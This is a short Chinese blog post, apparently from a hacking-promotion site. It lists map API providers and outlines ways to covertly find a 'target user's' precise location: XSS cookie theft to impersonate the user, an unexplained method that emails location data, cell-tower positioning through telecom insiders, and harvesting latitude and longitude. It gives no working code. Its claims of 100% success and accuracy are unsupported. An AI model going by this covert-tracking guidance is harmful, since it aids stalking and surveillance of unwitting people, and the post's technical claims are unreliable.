开发者供应商地址:http://lbs.amap.com/

http//developer.baidu.com/

http://open.qq.com/

http://open.weibo.com/

https://developers.google.com/

使用以上开发者平台可以更 准确的进行精度和纬度的定位,但是最准确的应该是高德的地图aip接口了,因为 我之前测试百度的定位相差大概有几百公里,而高德的相差在几米左右,也就是说,如果你进行精准定位可以参考高德的地图定位以及移动端安卓端定位的开放例程,一般来说一些api定位有免费和付费两个项目,免费只供给百分之1到百分之10的ip用户定位,所以具体参考以上地图开发商的参考数据。

如何实现黑客利用精准定位进行探索目标用户的精准位置呢?

首先这里举两个例子:第一个是xss获取cookie来进行模拟用户访问,这样可以获取当时用户的访问页面,然后根据精度和纬度进行查看地址。查询方法已经在上述介绍中详细介绍了,这里就不做探究了。理论:模拟用户访问页面时的历史数据,在谷歌cookie伪造功工具的情况下进行目标精准定位的“攻击”,成功率100%

第二种方法:情歌的方法给出:通过特殊写法可以把定位到的数据发送到邮箱理论可以行应该是100%,测试端为移动端。

第三种方法为:基站定位,精准度为100%   通过移动电话进行基站定位非常的准确,黑客的利用率非常高(你必须得有联通和移动的服务器维护等相关人员和资格证才可以进行并且在其内部工作)

第四种方法:通过获取用户的精度和纬度进行精准定位其实和第一二中的方法类似。

有什么不懂的可以留言。

以上详细介绍了如何使用api进行对目标用户的定位,至于如何获取用户的浏览数据,相信还有很多的理论知识和实践知识,这里说的是:一些gps定位方法。

我们还在探索,我们会吧最新的黑客知识带给大家。欢迎关注我们站点。